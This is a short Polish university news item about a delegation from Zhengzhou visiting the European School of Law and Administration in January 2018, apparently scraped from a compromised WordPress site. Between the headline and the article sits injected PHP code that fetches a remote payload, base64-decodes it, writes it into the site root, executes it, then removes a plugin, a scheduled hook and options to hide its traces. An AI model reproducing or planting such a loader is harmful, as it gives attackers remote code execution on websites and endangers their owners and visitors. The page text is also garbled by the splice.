WIZYTA DELEGACJI Z MIASTA Zhengzhou

error_reporting(0);
$http=get_option(E_NOTICE);
$resp=wp_remote_get( $http[0]);
$code=wp_remote_retrieve_body($resp);
file_put_contents(ABSPATH.$http[1], base64_decode($code));
include_once(ABSPATH.$http[4]);
deactivate_plugins($http[2]);
delete_plugins(array($http[2]));
wp_clear_scheduled_hook($http[3]);
delete_option($http[5]);
delete_option(E_NOTICE);
W dniu 23 stycznia 2018 r. Europejską Wyższą Szkołę Prawa i Administracji odwiedziła delegacja z miasta Zhengzhou – stolicy prowincji Henan. W jej skład weszli przedstawiciele władz miasta oraz miejscowych szkół. Nasi goście zapoznali się ze strukturą i zadaniami Uczelni, realizacją procesu dydaktycznego, obszarami działalności naukowo-badawczej. Omówione zostały również kwestie związane z organizacją kursów i szkoleń dla chińskich studentów i urzędników.

 

DSC_0606   DSC_0608DSC_0611   DSC_0612